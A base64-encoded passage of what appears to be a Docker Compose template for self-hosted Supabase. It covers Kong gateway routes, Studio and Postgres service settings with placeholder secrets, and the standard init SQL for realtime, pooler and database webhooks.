cDovL3N1cGFiYXNlLWF1dGg6OTk5OS8qJ1xuICAgIHVybDogaHR0cDovL3N1cGFiYXNlLWF1dGg6OTk5OS9cbiAgICByb3V0ZXM6XG4gICAgICAtIG5hbWU6IGF1dGgtdjEtYWxsXG4gICAgICAgIHN0cmlwX3BhdGg6IHRydWVcbiAgICAgICAgcGF0aHM6XG4gICAgICAgICAgLSAvYXV0aC92MS9cbiAgICBwbHVnaW5zOlxuICAgICAgLSBuYW1lOiBjb3JzXG4gICAgICAtIG5hbWU6IGtleS1hdXRoXG4gICAgICAgIGNvbmZpZzpcbiAgICAgICAgICBoaWRlX2NyZWRlbnRpYWxzOiBmYWxzZVxuICAgICAgLSBuYW1lOiBhY2xcbiAgICAgICAgY29uZmlnOlxuICAgICAgICAgIGhpZGVfZ3JvdXBzX2hlYWRlcjogdHJ1ZVxuICAgICAgICAgIGFsbG93OlxuICAgICAgICAgICAgLSBhZG1pblxuICAgICAgICAgICAgLSBhbm9uXG5cbiAgIyMgU2VjdXJlIFJFU1Qgcm91dGVzXG4gIC0gbmFtZTogcmVzdC12MVxuICAgIF9jb21tZW50OiAnUG9zdGdSRVNUOiAvcmVzdC92MS8qIC0+IGh0dHA6Ly9zdXBhYmFzZS1yZXN0OjMwMDAvKidcbiAgICB1cmw6IGh0dHA6Ly9zdXBhYmFzZS1yZXN0OjMwMDAvXG4gICAgcm91dGVzOlxuICAgICAgLSBuYW1lOiByZXN0LXYxLWFsbFxuICAgICAgICBzdHJpcF9wYXRoOiB0cnVlXG4gICAgICAgIHBhdGhzOlxuICAgICAgICAgIC0gL3Jlc3QvdjEvXG4gICAgcGx1Z2luczpcbiAgICAgIC0gbmFtZTogY29yc1xuICAgICAgLSBuYW1lOiBrZXktYXV0aFxuICAgICAgICBjb25maWc6XG4gICAgICAgICAgaGlkZV9jcmVkZW50aWFsczogdHJ1ZVxuICAgICAgLSBuYW1lOiBhY2xcbiAgICAgICAgY29uZmlnOlxuICAgICAgICAgIGhpZGVfZ3JvdXBzX2hlYWRlcjogdHJ1ZVxuICAgICAgICAgIGFsbG93OlxuICAgICAgICAgICAgLSBhZG1pblxuICAgICAgICAgICAgLSBhbm9uXG5cbiAgIyMgU2VjdXJlIEdyYXBoUUwgcm91dGVzXG4gIC0gbmFtZTogZ3JhcGhxbC12MVxuICAgIF9jb21tZW50OiAnUG9zdGdSRVNUOiAvZ3JhcGhxbC92MS8qIC0+IGh0dHA6Ly9zdXBhYmFzZS1yZXN0OjMwMDAvcnBjL2dyYXBocWwnXG4gICAgdXJsOiBodHRwOi8vc3VwYWJhc2UtcmVzdDozMDAwL3JwYy9ncmFwaHFsXG4gICAgcm91dGVzOlxuICAgICAgLSBuYW1lOiBncmFwaHFsLXYxLWFsbFxuICAgICAgICBzdHJpcF9wYXRoOiB0cnVlXG4gICAgICAgIHBhdGhzOlxuICAgICAgICAgIC0gL2dyYXBocWwvdjFcbiAgICBwbHVnaW5zOlxuICAgICAgLSBuYW1lOiBjb3JzXG4gICAgICAtIG5hbWU6IGtleS1hdXRoXG4gICAgICAgIGNvbmZpZzpcbiAgICAgICAgICBoaWRlX2NyZWRlbnRpYWxzOiB0cnVlXG4gICAgICAtIG5hbWU6IHJlcXVlc3QtdHJhbnNmb3JtZXJcbiAgICAgICAgY29uZmlnOlxuICAgICAgICAgIGFkZDpcbiAgICAgICAgICAgIGhlYWRlcnM6XG4gICAgICAgICAgICAgIC0gQ29udGVudC1Qcm9maWxlOmdyYXBocWxfcHVibGljXG4gICAgICAtIG5hbWU6IGFjbFxuICAgICAgICBjb25maWc6XG4gICAgICAgICAgaGlkZV9ncm91cHNfaGVhZGVyOiB0cnVlXG4gICAgICAgICAgYWxsb3c6XG4gICAgICAgICAgICAtIGFkbWluXG4gICAgICAgICAgICAtIGFub25cblxuICAjIyBTZWN1cmUgUmVhbHRpbWUgcm91dGVzXG4gIC0gbmFtZTogcmVhbHRpbWUtdjEtd3NcbiAgICBfY29tbWVudDogJ1JlYWx0aW1lOiAvcmVhbHRpbWUvdjEvKiAtPiB3czovL3JlYWx0aW1lOjQwMDAvc29ja2V0LyonXG4gICAgdXJsOiBodHRwOi8vcmVhbHRpbWUtZGV2OjQwMDAvc29ja2V0XG4gICAgcHJvdG9jb2w6IHdzXG4gICAgcm91dGVzOlxuICAgICAgLSBuYW1lOiByZWFsdGltZS12MS13c1xuICAgICAgICBzdHJpcF9wYXRoOiB0cnVlXG4gICAgICAgIHBhdGhzOlxuICAgICAgICAgIC0gL3JlYWx0aW1lL3YxL1xuICAgIHBsdWdpbnM6XG4gICAgICAtIG5hbWU6IGNvcnNcbiAgICAgIC0gbmFtZToga2V5LWF1dGhcbiAgICAgICAgY29uZmlnOlxuICAgICAgICAgIGhpZGVfY3JlZGVudGlhbHM6IGZhbHNlXG4gICAgICAtIG5hbWU6IGFjbFxuICAgICAgICBjb25maWc6XG4gICAgICAgICAgaGlkZV9ncm91cHNfaGVhZGVyOiB0cnVlXG4gICAgICAgICAgYWxsb3c6XG4gICAgICAgICAgICAtIGFkbWluXG4gICAgICAgICAgICAtIGFub25cbiAgLSBuYW1lOiByZWFsdGltZS12MS1yZXN0XG4gICAgX2NvbW1lbnQ6ICdSZWFsdGltZTogL3JlYWx0aW1lL3YxLyogLT4gd3M6Ly9yZWFsdGltZTo0MDAwL3NvY2tldC8qJ1xuICAgIHVybDogaHR0cDovL3JlYWx0aW1lLWRldjo0MDAwL2FwaVxuICAgIHByb3RvY29sOiBodHRwXG4gICAgcm91dGVzOlxuICAgICAgLSBuYW1lOiByZWFsdGltZS12MS1yZXN0XG4gICAgICAgIHN0cmlwX3BhdGg6IHRydWVcbiAgICAgICAgcGF0aHM6XG4gICAgICAgICAgLSAvcmVhbHRpbWUvdjEvYXBpXG4gICAgcGx1Z2luczpcbiAgICAgIC0gbmFtZTogY29yc1xuICAgICAgLSBuYW1lOiBrZXktYXV0aFxuICAgICAgICBjb25maWc6XG4gICAgICAgICAgaGlkZV9jcmVkZW50aWFsczogZmFsc2VcbiAgICAgIC0gbmFtZTogYWNsXG4gICAgICAgIGNvbmZpZzpcbiAgICAgICAgICBoaWRlX2dyb3Vwc19oZWFkZXI6IHRydWVcbiAgICAgICAgICBhbGxvdzpcbiAgICAgICAgICAgIC0gYWRtaW5cbiAgICAgICAgICAgIC0gYW5vblxuXG4gICMjIFN0b3JhZ2Ugcm91dGVzOiB0aGUgc3RvcmFnZSBzZXJ2ZXIgbWFuYWdlcyBpdHMgb3duIGF1dGhcbiAgLSBuYW1lOiBzdG9yYWdlLXYxXG4gICAgX2NvbW1lbnQ6ICdTdG9yYWdlOiAvc3RvcmFnZS92MS8qIC0+IGh0dHA6Ly9zdXBhYmFzZS1zdG9yYWdlOjUwMDAvKidcbiAgICB1cmw6IGh0dHA6Ly9zdXBhYmFzZS1zdG9yYWdlOjUwMDAvXG4gICAgcm91dGVzOlxuICAgICAgLSBuYW1lOiBzdG9yYWdlLXYxLWFsbFxuICAgICAgICBzdHJpcF9wYXRoOiB0cnVlXG4gICAgICAgIHBhdGhzOlxuICAgICAgICAgIC0gL3N0b3JhZ2UvdjEvXG4gICAgcGx1Z2luczpcbiAgICAgIC0gbmFtZTogY29yc1xuXG4gICMjIEVkZ2UgRnVuY3Rpb25zIHJvdXRlc1xuICAtIG5hbWU6IGZ1bmN0aW9ucy12MVxuICAgIF9jb21tZW50OiAnRWRnZSBGdW5jdGlvbnM6IC9mdW5jdGlvbnMvdjEvKiAtPiBodHRwOi8vc3VwYWJhc2UtZWRnZS1mdW5jdGlvbnM6OTAwMC8qJ1xuICAgIHVybDogaHR0cDovL3N1cGFiYXNlLWVkZ2UtZnVuY3Rpb25zOjkwMDAvXG4gICAgcm91dGVzOlxuICAgICAgLSBuYW1lOiBmdW5jdGlvbnMtdjEtYWxsXG4gICAgICAgIHN0cmlwX3BhdGg6IHRydWVcbiAgICAgICAgcGF0aHM6XG4gICAgICAgICAgLSAvZnVuY3Rpb25zL3YxL1xuICAgIHBsdWdpbnM6XG4gICAgICAtIG5hbWU6IGNvcnNcblxuICAjIyBBbmFseXRpY3Mgcm91dGVzXG4gIC0gbmFtZTogYW5hbHl0aWNzLXYxXG4gICAgX2NvbW1lbnQ6ICdBbmFseXRpY3M6IC9hbmFseXRpY3MvdjEvKiAtPiBodHRwOi8vbG9nZmxhcmU6NDAwMC8qJ1xuICAgIHVybDogaHR0cDovL3N1cGFiYXNlLWFuYWx5dGljczo0MDAwL1xuICAgIHJvdXRlczpcbiAgICAgIC0gbmFtZTogYW5hbHl0aWNzLXYxLWFsbFxuICAgICAgICBzdHJpcF9wYXRoOiB0cnVlXG4gICAgICAgIHBhdGhzOlxuICAgICAgICAgIC0gL2FuYWx5dGljcy92MS9cblxuICAjIyBTZWN1cmUgRGF0YWJhc2Ugcm91dGVzXG4gIC0gbmFtZTogbWV0YVxuICAgIF9jb21tZW50OiAncGctbWV0YTogL3BnLyogLT4gaHR0cDovL3N1cGFiYXNlLW1ldGE6ODA4MC8qJ1xuICAgIHVybDogaHR0cDovL3N1cGFiYXNlLW1ldGE6ODA4MC9cbiAgICByb3V0ZXM6XG4gICAgICAtIG5hbWU6IG1ldGEtYWxsXG4gICAgICAgIHN0cmlwX3BhdGg6IHRydWVcbiAgICAgICAgcGF0aHM6XG4gICAgICAgICAgLSAvcGcvXG4gICAgcGx1Z2luczpcbiAgICAgIC0gbmFtZToga2V5LWF1dGhcbiAgICAgICAgY29uZmlnOlxuICAgICAgICAgIGhpZGVfY3JlZGVudGlhbHM6IGZhbHNlXG4gICAgICAtIG5hbWU6IGFjbFxuICAgICAgICBjb25maWc6XG4gICAgICAgICAgaGlkZV9ncm91cHNfaGVhZGVyOiB0cnVlXG4gICAgICAgICAgYWxsb3c6XG4gICAgICAgICAgICAtIGFkbWluXG5cbiAgIyMgUHJvdGVjdGVkIERhc2hib2FyZCAtIGNhdGNoIGFsbCByZW1haW5pbmcgcm91dGVzXG4gIC0gbmFtZTogZGFzaGJvYXJkXG4gICAgX2NvbW1lbnQ6ICdTdHVkaW86IC8qIC0+IGh0dHA6Ly9zdHVkaW86MzAwMC8qJ1xuICAgIHVybDogaHR0cDovL3N1cGFiYXNlLXN0dWRpbzozMDAwL1xuICAgIHJvdXRlczpcbiAgICAgIC0gbmFtZTogZGFzaGJvYXJkLWFsbFxuICAgICAgICBzdHJpcF9wYXRoOiB0cnVlXG4gICAgICAgIHBhdGhzOlxuICAgICAgICAgIC0gL1xuICAgIHBsdWdpbnM6XG4gICAgICAtIG5hbWU6IGNvcnNcbiAgICAgIC0gbmFtZTogYmFzaWMtYXV0aFxuICAgICAgICBjb25maWc6XG4gICAgICAgICAgaGlkZV9jcmVkZW50aWFsczogdHJ1ZVxuIgogIHN1cGFiYXNlLXN0dWRpbzoKICAgIGltYWdlOiAnc3VwYWJhc2Uvc3R1ZGlvOjIwMjUuMTIuMTctc2hhLTQzZjRmN2YnCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRAogICAgICAgIC0gbm9kZQogICAgICAgIC0gJy1lJwogICAgICAgIC0gImZldGNoKCdodHRwOi8vMTI3LjAuMC4xOjMwMDAvYXBpL3BsYXRmb3JtL3Byb2ZpbGUnKS50aGVuKChyKSA9PiB7aWYgKHIuc3RhdHVzICE9PSAyMDApIHRocm93IG5ldyBFcnJvcihyLnN0YXR1cyl9KSIKICAgICAgdGltZW91dDogNXMKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHJldHJpZXM6IDMKICAgIGRlcGVuZHNfb246CiAgICAgIHN1cGFiYXNlLWFuYWx5dGljczoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gSE9TVE5BTUU9MC4wLjAuMAogICAgICAtICdTVFVESU9fUEdfTUVUQV9VUkw9aHR0cDovL3N1cGFiYXNlLW1ldGE6ODA4MCcKICAgICAgLSAnUE9TVEdSRVNfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTfScKICAgICAgLSAnREVGQVVMVF9PUkdBTklaQVRJT05fTkFNRT0ke1NUVURJT19ERUZBVUxUX09SR0FOSVpBVElPTjotRGVmYXVsdCBPcmdhbml6YXRpb259JwogICAgICAtICdERUZBVUxUX1BST0pFQ1RfTkFNRT0ke1NUVURJT19ERUZBVUxUX1BST0pFQ1Q6LURlZmF1bHQgUHJvamVjdH0nCiAgICAgIC0gJ1NVUEFCQVNFX1VSTD1odHRwOi8vc3VwYWJhc2Uta29uZzo4MDAwJwogICAgICAtICdTVVBBQkFTRV9QVUJMSUNfVVJMPSR7U0VSVklDRV9GUUROX1NVUEFCQVNFS09OR30nCiAgICAgIC0gJ1NVUEFCQVNFX0FOT05fS0VZPSR7U0VSVklDRV9TVVBBQkFTRUFOT05fS0VZfScKICAgICAgLSAnU1VQQUJBU0VfU0VSVklDRV9LRVk9JHtTRVJWSUNFX1NVUEFCQVNFU0VSVklDRV9LRVl9JwogICAgICAtICdBVVRIX0pXVF9TRUNSRVQ9JHtTRVJWSUNFX1BBU1NXT1JEX0pXVH0nCiAgICAgIC0gJ0xPR0ZMQVJFX0FQSV9LRVk9JHtTRVJWSUNFX1BBU1NXT1JEX0xPR0ZMQVJFfScKICAgICAgLSAnTE9HRkxBUkVfVVJMPWh0dHA6Ly9zdXBhYmFzZS1hbmFseXRpY3M6NDAwMCcKICAgICAgLSAnU1VQQUJBU0VfUFVCTElDX0FQST0ke1NFUlZJQ0VfRlFETl9TVVBBQkFTRUtPTkd9JwogICAgICAtIE5FWFRfUFVCTElDX0VOQUJMRV9MT0dTPXRydWUKICAgICAgLSBORVhUX0FOQUxZVElDU19CQUNLRU5EX1BST1ZJREVSPXBvc3RncmVzCiAgICAgIC0gJ09QRU5BSV9BUElfS0VZPSR7T1BFTkFJX0FQSV9LRVl9JwogIHN1cGFiYXNlLWRiOgogICAgaW1hZ2U6ICdzdXBhYmFzZS9wb3N0Z3JlczoxNS44LjEuMDQ4JwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6ICdwZ19pc3JlYWR5IC1VIHBvc3RncmVzIC1oIDEyNy4wLjAuMScKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDVzCiAgICAgIHJldHJpZXM6IDEwCiAgICBkZXBlbmRzX29uOgogICAgICBzdXBhYmFzZS12ZWN0b3I6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgIGNvbW1hbmQ6CiAgICAgIC0gcG9zdGdyZXMKICAgICAgLSAnLWMnCiAgICAgIC0gY29uZmlnX2ZpbGU9L2V0Yy9wb3N0Z3Jlc3FsL3Bvc3RncmVzcWwuY29uZgogICAgICAtICctYycKICAgICAgLSBsb2dfbWluX21lc3NhZ2VzPWZhdGFsCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBQT1NUR1JFU19IT1NUPS92YXIvcnVuL3Bvc3RncmVzcWwKICAgICAgLSAnUEdQT1JUPSR7UE9TVEdSRVNfUE9SVDotNTQzMn0nCiAgICAgIC0gJ1BPU1RHUkVTX1BPUlQ9JHtQT1NUR1JFU19QT1JUOi01NDMyfScKICAgICAgLSAnUEdQQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVN9JwogICAgICAtICdQT1NUR1JFU19QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVN9JwogICAgICAtICdQR0RBVEFCQVNFPSR7UE9TVEdSRVNfREI6LXBvc3RncmVzfScKICAgICAgLSAnUE9TVEdSRVNfREI9JHtQT1NUR1JFU19EQjotcG9zdGdyZXN9JwogICAgICAtICdKV1RfU0VDUkVUPSR7U0VSVklDRV9QQVNTV09SRF9KV1R9JwogICAgICAtICdKV1RfRVhQPSR7SldUX0VYUElSWTotMzYwMH0nCiAgICB2b2x1bWVzOgogICAgICAtICdzdXBhYmFzZS1kYi1kYXRhOi92YXIvbGliL3Bvc3RncmVzcWwvZGF0YScKICAgICAgLQogICAgICAgIHR5cGU6IGJpbmQKICAgICAgICBzb3VyY2U6IC4vdm9sdW1lcy9kYi9yZWFsdGltZS5zcWwKICAgICAgICB0YXJnZXQ6IC9kb2NrZXItZW50cnlwb2ludC1pbml0ZGIuZC9taWdyYXRpb25zLzk5LXJlYWx0aW1lLnNxbAogICAgICAgIGNvbnRlbnQ6ICJcXHNldCBwZ3VzZXIgYGVjaG8gXCJzdXBhYmFzZV9hZG1pblwiYFxuXG5jcmVhdGUgc2NoZW1hIGlmIG5vdCBleGlzdHMgX3JlYWx0aW1lO1xuYWx0ZXIgc2NoZW1hIF9yZWFsdGltZSBvd25lciB0byA6cGd1c2VyO1xuIgogICAgICAtCiAgICAgICAgdHlwZTogYmluZAogICAgICAgIHNvdXJjZTogLi92b2x1bWVzL2RiL19zdXBhYmFzZS5zcWwKICAgICAgICB0YXJnZXQ6IC9kb2NrZXItZW50cnlwb2ludC1pbml0ZGIuZC9taWdyYXRpb25zLzk3LV9zdXBhYmFzZS5zcWwKICAgICAgICBjb250ZW50OiAiXFxzZXQgcGd1c2VyIGBlY2hvIFwiJFBPU1RHUkVTX1VTRVJcImBcblxuQ1JFQVRFIERBVEFCQVNFIF9zdXBhYmFzZSBXSVRIIE9XTkVSIDpwZ3VzZXI7XG4iCiAgICAgIC0KICAgICAgICB0eXBlOiBiaW5kCiAgICAgICAgc291cmNlOiAuL3ZvbHVtZXMvZGIvcG9vbGVyLnNxbAogICAgICAgIHRhcmdldDogL2RvY2tlci1lbnRyeXBvaW50LWluaXRkYi5kL21pZ3JhdGlvbnMvOTktcG9vbGVyLnNxbAogICAgICAgIGNvbnRlbnQ6ICJcXHNldCBwZ3VzZXIgYGVjaG8gXCJzdXBhYmFzZV9hZG1pblwiYFxuXFxjIF9zdXBhYmFzZVxuY3JlYXRlIHNjaGVtYSBpZiBub3QgZXhpc3RzIF9zdXBhdmlzb3I7XG5hbHRlciBzY2hlbWEgX3N1cGF2aXNvciBvd25lciB0byA6cGd1c2VyO1xuXFxjIHBvc3RncmVzXG4iCiAgICAgIC0KICAgICAgICB0eXBlOiBiaW5kCiAgICAgICAgc291cmNlOiAuL3ZvbHVtZXMvZGIvd2ViaG9va3Muc3FsCiAgICAgICAgdGFyZ2V0OiAvZG9ja2VyLWVudHJ5cG9pbnQtaW5pdGRiLmQvaW5pdC1zY3JpcHRzLzk4LXdlYmhvb2tzLnNxbAogICAgICAgIGNvbnRlbnQ6ICJCRUdJTjtcbi0tIENyZWF0ZSBwZ19uZXQgZXh0ZW5zaW9uXG5DUkVBVEUgRVhURU5TSU9OIElGIE5PVCBFWElTVFMgcGdfbmV0IFNDSEVNQSBleHRlbnNpb25zO1xuLS0gQ3JlYXRlIHN1cGFiYXNlX2Z1bmN0aW9ucyBzY2hlbWFcbkNSRUFURSBTQ0hFTUEgc3VwYWJhc2VfZnVuY3Rpb25zIEFVVEhPUklaQVRJT04gc3VwYWJhc2VfYWRtaW47XG5HUkFOVCBVU0FHRSBPTiBTQ0hFTUEgc3VwYWJhc2VfZnVuY3Rpb25zIFRPIHBvc3RncmVzLCBhbm9uLCBhdXRoZW50aWNhdGVkLCBzZXJ2aWNlX3JvbGU7XG5BTFRFUiBERUZBVUxUIFBSSVZJTEVHRVMgSU4gU0NIRU1BIHN1cGFiYXNlX2Z1bmN0aW9ucyBHUkFOVCBBTEwgT04gVEFCTEVTIFRPIHBvc3RncmVzLCBhbm9uLCBhdXRoZW50aWNhdGVkLCBzZXJ2aWNlX3JvbGU7XG5BTFRFUiBERUZBVUxUIFBSSVZJTEVHRVMgSU4gU0NIRU1BIHN1cGFiYXNlX2Z1bmN0aW9ucyBHUkFOVCBBTEwgT04gRlVOQ1RJT05TIFRPIHBvc3RncmVzLCBhbm9uLCBhdXRoZW50aWNhdGVkLCBzZXJ2aWNlX3JvbGU7XG5BTFRFUiBERUZBVUxUIFBSSVZJTEVHRVMgSU4gU0NIRU1BIHN1cGFiYXNlX2Z1bmN0aW9ucyBHUkFOVCBBTEwgT04gU0VRVUVOQ0VTIFRPIHBvc3RncmVzLCBhbm9uLCBhdXRoZW50aWNhdGVkLCBzZXJ2aWNlX3JvbGU7XG4tLSBzdXBhYmFzZV9mdW5jdGlvbnMubWlncmF0aW9ucyBkZWZpbml0aW9uXG5DUkVBVEUgVEFCTEUgc3VwYWJhc2VfZnVuY3Rpb25zLm1pZ3JhdGlvbnMgKFxuICB2ZXJzaW9uIHRleHQgUFJJTUFSWSBLRVksXG4gIGluc2VydGVkX2F0IHRpbWVzdGFtcHR6IE5PVCBOVUxMIERFRkFVTFQgTk9XKClcbik7XG4tLSBJbml0aWFsIHN1cGFiYXNlX2Z1bmN0aW9ucyBtaWdyYXRpb25cbklOU0VSVCBJTlRPIHN1cGFiYXNlX2Z1bmN0aW9ucy5taWdyYXRpb25zICh2ZXJzaW9uKSBWQUxVRVMgKCdpbml0aWFsJyk7XG4tLSBzdXBhYmFzZV9mdW5jdGlvbnMuaG9va3MgZGVmaW5pdGlvblxuQ1JFQVRFIFRBQkxFIHN1cGFiYXNlX2Z1bmN0aW9ucy5ob29rcyAoXG4gIGlkIGJpZ3NlcmlhbCBQUklNQVJZIEtFWSxcbiAgaG9va190YWJsZV9pZCBpbnRlZ2VyIE5PVCBOVUxMLFxuICBob29rX25hbWUgdGV4dCBOT1QgTlVMTCxcbiAgY3JlYXRlZF9hdCB0aW1lc3RhbXB0eiBOT1QgTlVMTCBERUZBVUxUIE5PVygpLFxuICByZXF1ZXN0X2lkIGJpZ2ludFxuKTtcbkNSRUFURSBJTkRFWCBzdXBhYmFzZV9mdW5jdGlvbnNfaG9va3NfcmVxdWVzdF9pZF9pZHggT04gc3VwYWJhc2VfZnVuY3Rpb25zLmhvb2tzIFVTSU5HIGJ0cmVlIChyZXF1ZXN0X2lkKTtcbkNSRUFURSBJTkRFWCBzdXBhYmFzZV9mdW5jdGlvbnNfaG9va3NfaF90YWJsZV9pZF9oX25hbWVfaWR4IE9OIHN1cGFiYXNlX2Z1bmN0aW9ucy5ob29rcyBVU0lORyBidHJlZSAoaG9va190YWJsZV9pZCwgaG9va19uYW1lKTtcbkNPTU1FTlQgT04gVEFCTEUgc3VwYWJhc2VfZnVuY3Rpb25zLmhvb2tzIElTICdTdXBhYmFzZSBGdW5jdGlvbnMgSG9va3M6IEF1ZGl0IHRyYWlsIGZvciB0cmlnZ2VyZWQgaG9va3MuJztcbkNSRUFURSBGVU5DVElPTiBzdXBhYmFzZV9mdW5jdGlvbnMuaHR0cF9yZXF1ZXN0KClcbiAgUkVUVVJOUyB0cmlnZ2VyXG4gIExBTkdVQUdFIHBscGdzcWxcbiAgQVMgJGZ1bmN0aW9uJFxuICBERUNMQVJFXG4gICAgcmVxdWVzdF9pZCBiaWdpbnQ7XG4gICAgcGF5bG9hZCBqc29uYjtcbiAgICB1cmwgdGV4dCA6PSBUR19BUkdWWzBdOjp0ZXh0O1xuICAgIG1ldGhvZCB0ZXh0IDo9IFRHX0FSR1ZbMV06OnRleHQ7XG4gICAgaGVhZGVycyBqc29uYiBERUZBVUxUICd7fSc6Ompzb25iO1xuICAgIHBhcmFtcyBqc29uYiBERUZBVUxUICd7fSc6Ompzb25iO1xuICAgIHRpbWVvdXRfbXMgaW50ZWdlciBERUZBVUxUIDEwMDA7XG4gIEJFR0lOXG4gICAgSUYgdXJsIElTIE5VTEwgT1IgdXJsID0gJ251bGwnIFRIRU5cbiAgICAgIFJBSVNFIEVYQ0VQVElPTiAndXJsIGFyZ3VtZW50IGlzIG1pc3NpbmcnO1xuICAgIEVORCBJRjtcblxuICAgIElGIG1ldGhvZCBJUyBOVUxMIE9SIG1ldGhvZCA9ICdudWxsJyBUSEVOXG4gICAgICBSQUlTRSBFWENFUFRJT04gJ21ldGhvZCBhcmd1bWVudCBpcyBtaXNzaW5nJztcbiAgICBFTkQgSUY7XG5cbiAgICBJRiBUR19BUkdWWzJdIElTIE5VTEwgT1IgVEdfQVJHVlsyXSA9ICdudWxsJyBUSEVOXG4gICAgICBoZWFkZXJzID0gJ3tcIkNvbnRlbnQtVHlwZVwiOiBcImFwcGxpY2F0aW9uL2pzb25cIn0nOjpqc29uYjtcbiAgICBFTFNFXG4gICAgICBoZWFkZXJzID0gVEdfQVJHVlsyXTo6anNvbmI7XG4gICAgRU5EIElGO1xuXG4gICAgSUYgVEdfQVJHVlszXSBJUyBOVUxMIE9SIFRHX0FSR1ZbM10gPSAnbnVsbCcgVEhFTlxuICAgICAgcGFyYW1zID0gJ3t9Jzo6anNvbmI7XG4gICAgRUxTRVxuICAgICAgcGFyYW1zID0gVEdfQVJHVlszXTo6anNvbmI7XG4gICAgRU5EIElGO1xuXG4gICAgSUYgVEdfQVJHVls0XSBJUyBOVUxMIE9SIFRHX0FSR1ZbNF0gPSAnbnVsbCcgVEhFTlxuICAgICAgdGltZW91dF9tcyA9IDEwMDA7XG4gICAgRUxTRVxuICAgICAgdGltZW91dF9tcyA9IFRHX0FSR1ZbNF06OmludGVnZXI7XG4gICAgRU5EIElGO1xuXG4gICAgQ0FTRVxuICAgICAgV0hFTiBtZXRob2QgPSAnR0VUJyBUSEVOXG4gICAgICAgIFNFTEVDVCBodHRwX2dldCBJTlRPIHJlcXVlc3RfaWQgRlJPTSBuZXQuaHR0cF9nZXQoXG4gICAgICAgICAgdXJsLFxuICAgICAgICAgIHBhcmFtcyxcbiAgICAgICAgICBoZWFkZXJzLFxuICAgICAgICAgIHRpbWVvdXRfbXNcbiAgICAgICAgKTtcbiAgICAgIFdIRU4gbWV0aG9kID0gJ1BPU1QnIFRIRU5cbiAgICAgICAgcGF5bG9hZCA9IGpzb25iX2J1aWxkX29iamVjdChcbiAgICAgICAgICAnb2xkX3JlY29yZCcsIE9MRCxcbiAgICAgICAgICAncmVjb3JkJywgTkVXLFxuICAgICAgICAgICd0eXBlJywgVEdfT1AsXG4gICAgICAgICAgJ3RhYmxlJywgVEdfVEFCTEVfTkFNRSxcbiAgICAgICAgICAnc2NoZW1hJywgVEdfVEFCTEVfU0NIRU1BXG4gICAgICAgICk7XG5cbiAgICAgICAgU0VMRUNUIGh0dHBfcG9zdCBJTlRPIHJlcXVlc3RfaWQgRlJPTSBuZXQuaHR0cF9wb3N0KFxuICAgICAgICAgIHVybCxcbiAgICAgICAgICBwYXlsb2FkLFxuICAgICAgICAgIHBhcmFtcyxcbiAgICAgICAgICBoZWFkZXJzLFxuICAgICAgICAgIHRpbWVvdXRfbXNcbiAgICAgICAgKTtcbiAgICAgIEVMU0VcbiAgICAgICAgUkFJU0UgRVhDRVBUSU9OICdtZXRob2QgYXJndW1lbnQgJSBpcyBpbnZhbGlkJywgbWV0aG9kO1xuICAgIEVORCBDQVNFO1xuXG4gICAgSU5TRVJUIElOVE8gc3VwYWJhc2VfZnVuY3Rpb25zLmhvb2tzXG4gICAgICAoaG9va190YWJsZV9pZCwgaG9va19uYW1lLCByZXF1ZXN0X2lkKVxuICAgIFZBTFVFU1xuICAgICAgKFRHX1JFTElELCBUR19OQU1FLCByZXF1ZXN0X2lkKTtcblxuICAgIFJFVFVSTiBORVc7XG4gIEVORFxuJGZ1bmN0aW9uJDtcbi0tIFN1cGFiYXNlIHN1cGVyIGFkbWluXG5ET1xuJCRcbkJFR0lOXG4gIElGIE5PVCBFWElTVFMgKFxuICAgIFNFTEVDVCAxXG4gICAgRlJPTSBwZ19yb2xlc1xuICAgIFdIRVJFIHJvbG5hbWUgPSAnc3VwYWJhc2VfZnVuY3Rpb25zX2FkbWluJ1xuICApXG4gIFRIRU5cbiAgICBDUkVBVEUgVVNFUiBzdXBhYmFzZV9mdW5jdGlvbnNfYWRtaW4gTk9JTkhFUklUIENSRUFURVJPTEUgTE9HSU4gTk9SRVBMSUNBVElPTjtcbiAgRU5EIElGO1xuRU5EXG4kJDtcbkdSQU5UIEFMTCBQUklWSUxFR0VTIE9OIFNDSEVNQSBzdXBhYmFzZV9mdW5jdGlvbnMgVE8gc3VwYWJhc2VfZnVuY3Rpb25zX2FkbWluO1xuR1JBTlQgQUxMIFBSSVZJTEVHRVMgT04gQUxMIFRBQkxFUyBJTiBTQ0hFTUEgc3VwYWJhc2VfZnVuY3Rpb25zIFRPIHN1cGFiYXNlX2Z1bmN0aW9uc19hZG1pbjtcbkdSQU5UIEFMTCBQUklWSUxFR0VTIE9OIEFMTCBTRVFVRU5DRVMgSU4gU0NIRU1BIHN1cGFiYXNlX2Z1bmN0aW9ucyBUTyBzdXBhYmFzZV9mdW5jdGlvbnNfYWRtaW47XG5BTFRFUiBVU0VSIHN1cGFiYXNlX2Z1bmN0aW9uc19hZG1pbiBTRVQgc2VhcmNoX3BhdGggPSBcInN1cGFiYXNlX2Z1bmN0aW9uc1wiO1xuQUxURVIgdGFibGUgXCJzdXBhYmFzZV9mdW5jdGlvbnNcIi5taWdyYXRpb25zIE9XTkVSIFRPIHN1cGFiYXNlX2Z1bmN0aW9uc19hZG1pbjtcbkFMVEVSIHRhYmxlIFwic3VwYWJhc2VfZnVuY3Rpb25zXCIuaG9va3MgT1dORVIgVE8gc3VwYWJhc2VfZnVuY3Rpb25zX2FkbWluO1xuQUxURVIgZnVuY3Rpb24gXCJzdXBhYmFzZV9mdW5jdGlvbnNcIi5odHRwX3JlcXVlc3QoKSBPV05FUiBUTyBzdXBhYmFzZV9mdW5jdGlvbnNfYWRtaW47XG5HUkFOVCBzdXBhYmFzZV9mdW5jdGlvbnNfYWRtaW4gVE8gcG9zdGdyZXM7XG4tLSBSZW1vdmUgdW51c2VkIHN1cGFiYXNlX3BnX25l